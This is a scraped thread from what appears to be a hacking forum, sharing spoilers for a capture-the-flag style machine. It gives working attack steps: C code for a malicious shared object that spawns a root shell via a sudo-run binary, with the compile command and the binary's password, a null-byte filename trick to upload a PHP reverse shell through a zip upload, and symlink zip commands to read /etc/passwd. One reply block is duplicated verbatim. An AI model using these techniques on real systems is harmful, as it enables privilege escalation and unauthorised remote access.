[randomname188]

for privesc, you can see the binary /usr/bin/stock, when you call "sudo -l"
you can reverse engineer the binary and find the password and find that it loads the shared object from /home/rektsu/.config/libcounter.so
to exploit, you need to create malicious libcounter.so binary

example code (filename: exploit.c):

#include <unistd.h>

void begin (void) __attribute__((destructor));

void begin (void) {
    system("bash -p");
}

compile the code like this on the target machine:
gcc -shared -o /home/rektsu/.config/libcounter.so -fPIC exploit.c

then you can run the binary with sudo:
sudo /usr/bin/stock
# password: St0ckM4nager

press 3 to exit and you get root shell

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachedmw4otc2lhx7nqe4wyxfhpvy32ooz26opvqkmmrbg73c7ooad.onion/contact if you feel this is incorrect.

[cutty]

Was anyone able to find another path to user using zip slip and xss + rce? I'm having a hard time believing that the null-byte terminator filtering bypass trick was intended when there's a file disclosure vulnerability and xss.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | Contact us via http://breachedmw4otc2lhx7nqe4wyxfhpvy32ooz26opvqkmmrbg73c7ooad.onion/contact if you feel this is incorrect.

[iamauser]

how 
how do i find user.txt and other useful stuff when priveliges are restricted and how can i navigate in the system using  sylinks when i have no idea of where am i or what folder i have to access

[not_soEasyExploit]

Yes, got user and shell.. now trying to ROOT.  -.- " i think reversing is the path.

Can read user.txt but how did you get foothold?

Hi, i'm trying to use Zip Symlink to load into file.pdf "/etc/passwd".

I'm trying to do something like:

ln -s ../../../../etc/passwd symindex.pdf

zip --symlinks test.zip symindex.pdf

But, after succesfully uploaded zip file, i'm no able to load pdf file.

Could you give me some hint ? I'm not able to read files

[braindust]

Normal upload protection bypasses work, if you managed to create a file with those characters inside the zip.

i've tried using double extension, null byte at the end, and some other techniques but nothing worked as well, i can upload the file but always gonna be a PDF, and using the zip symlink i got the "/shop/index.php" but i didn't know if its possible to bypass the 

$page = isset($_GET['page']) && file_exists($_GET['page'] . '.php') ? $_GET['page'] : 'home';

so how did you triggered the file?

To get the rev shell: Give it a name, for example, shell.phpA.pdf. Compress it. You don't need to do any tricks with symbolic links. Open it in hexedit and change the 'A' to 00 (null byte). Upload this and go to the end point of the file you are given. Delete the <space> .pdf in the url. You will get a shell.

I've done this multiple times but instead after removing %20.pdf I get a 404 for some stupid reason.

[braindust]

Normal upload protection bypasses work, if you managed to create a file with those characters inside the zip.

i've tried using double extension, null byte at the end, and some other techniques but nothing worked as well, i can upload the file but always gonna be a PDF, and using the zip symlink i got the "/shop/index.php" but i didn't know if its possible to bypass the 

$page = isset($_GET['page']) && file_exists($_GET['page'] . '.php') ? $_GET['page'] : 'home';

so how did you triggered the file?

To get the rev shell: Give it a name, for example, shell.phpA.pdf. Compress it. You don't need to do any tricks with symbolic links. Open it in hexedit and change the 'A' to 00 (null byte). Upload this and go to the end point of the file you are given. Delete the <space> .pdf in the url. You will get a shell.

I've done this multiple times but instead after removing %20.pdf I get a 404 for some stupid reason.

Well, I got after a bit. When using hexedit, you will see shell.phpA.pdf in two places, just do the second. and follow @frfrfrfrfrfrf.

[Addka72424]

The last non-spam response in the topic was more than a month ago. I close the topic as irrelevant to prevent spam. If this is not the case, please send a pm and I will open the topic for discussion again.